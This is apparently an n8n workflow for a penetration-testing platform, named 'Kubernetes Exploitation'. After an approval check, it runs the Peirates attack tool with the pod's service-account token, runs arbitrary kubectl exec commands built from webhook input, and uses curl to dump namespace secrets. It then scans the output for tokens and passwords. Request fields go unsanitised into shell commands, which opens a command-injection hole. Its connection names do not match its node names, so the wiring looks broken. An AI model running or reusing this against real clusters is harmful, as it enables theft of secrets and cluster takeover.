id: 18
name: Kubernetes Exploitation
active: true
trigger: Approval required
settings:
  executionOrder: v1
nodes:
  - id: webhook
    name: Webhook Trigger
    type: n8n-nodes-base.webhook
    typeVersion: 1
    position:
      - 250
      - 300
    parameters:
      path: anptop/k8s-exploitation
      httpMethod: post
      options: {}
  - id: validate-approval
    name: Validate Approval
    type: n8n-nodes-base.httpRequest
    typeVersion: 1
    position:
      - 450
      - 300
    parameters:
      method: get
      url: >-
        http://backend:8000/api/v1/approvals/{{ $json.approval_id }}/validate
      sendHeaders: true
      headerParameters:
        parameters:
          - name: Authorization
            value: Bearer {{ $env.API_TOKEN }}
      options: {}
  - id: peirates
    name: Peirates Exploitation
    type: n8n-nodes-base.executeCommand
    typeVersion: 1
    position:
      - 650
      - 200
    parameters:
      command: >-
        peirates -s {{ $json.kubernetes_api || 'https://kubernetes.default:443' }} --token-file /var/run/secrets/kubernetes.io/serviceaccount/token 2>&1 || echo '{"exploits":[]}'
      options:
        shell: true
        timeout: 120
  - id: kubectl-exec
    name: Kubectl Commands
    type: n8n-nodes-base.executeCommand
    typeVersion: 1
    position:
      - 650
      - 400
    parameters:
      command: >-
        kubectl --context {{ $json.context }} --namespace {{ $json.namespace || 'default' }} exec {{ $json.pod }} -- {{ $json.command || 'whoami' }} 2>&1
      options:
        shell: true
        timeout: 60
  - id: service-account-abuse
    name: Service Account Abuse
    type: n8n-nodes-base.executeCommand
    typeVersion: 1
    position:
      - 650
      - 600
    parameters:
      command: >-
        curl -sk https://kubernetes.default/api/v1/namespaces/{{ $json.namespace }}/secrets 2>/dev/null | head -c 10000 || echo '{"resources":[]}'
      options:
        shell: true
        timeout: 30
  - id: parse-results
    name: Parse Results
    type: n8n-nodes-base.function
    typeVersion: 1
    position:
      - 850
      - 300
    parameters:
      functionCode: |
        const output = items[0].json.stdout || '';
        const error = items[0].json.stderr || '';
        
        const findings = {
          exploitation_success: false,
          sensitive_access: false,
          secrets_found: [],
          pods_accessible: [],
          cluster_admin_access: false
        };
        
        if (output.includes('error') || error.includes('forbidden')) {
          findings.exploitation_success = false;
        } else if (output.length > 0) {
          findings.exploitation_success = true;
          
          // Check for sensitive data
          if (output.includes('token') || output.includes('password') || output.includes('secret')) {
            findings.sensitive_access = true;
          }
          
          try {
            const data = JSON.parse(output);
            if (data.items) {
              findings.secrets_found = data.items.map(s => s.metadata?.name);
            }
          } catch (e) {}
        }
        
        return [{
          json: {
            ...items[0].json,
            findings: findings,
            output: output.substring(0, 10000)
          }
        }];
  - id: store-results
    name: Store Results
    type: n8n-nodes-base.httpRequest
    typeVersion: 1
    position:
      - 1050
      - 300
    parameters:
      method: post
      url: >-
        http://backend:8000/api/v1/k8s-exploitation
      sendHeaders: true
      headerParameters:
        parameters:
          - name: Authorization
            value: Bearer {{ $env.API_TOKEN }}
      sendBody: true
      bodyParameters:
        parameters:
          - name: json
            value: >-
              {{ $json }}
      options: {}
  - id: webhook-response
    name: Webhook Response
    type: n8n-nodes-base.webhook
    typeVersion: 1
    position:
      - 1250
      - 300
    parameters:
      respondWith: json
      jsonResponse: >-
        {"status": "completed", "exploitation_success": {{ $json.findings.exploitation_success }}, "execution_id": {{ $execution.id }} }
connections:
  Webhook Trigger:
    main:
      - - node: Validate Approval
          type: main
          index: 0
  Validate Approval:
    main:
      - - node: Peirates
          type: main
          index: 0
      - node: Kubectl Exec
          type: main
          index: 0
      - node: Service Account Abuse
          type: main
          index: 0
  Peirates:
    main:
      - - node: Parse Results
          type: main
          index: 0
  Kubectl Exec:
    main:
      - - node: Parse Results
          type: main
          index: 0
  Service Account Abuse:
    main:
      - - node: Parse Results
          type: main
          index: 0
  Parse Results:
    main:
      - - node: Store Results
          type: main
          index: 0
  Store Results:
    main:
      - - node: Webhook Response
          type: main
          index: 0
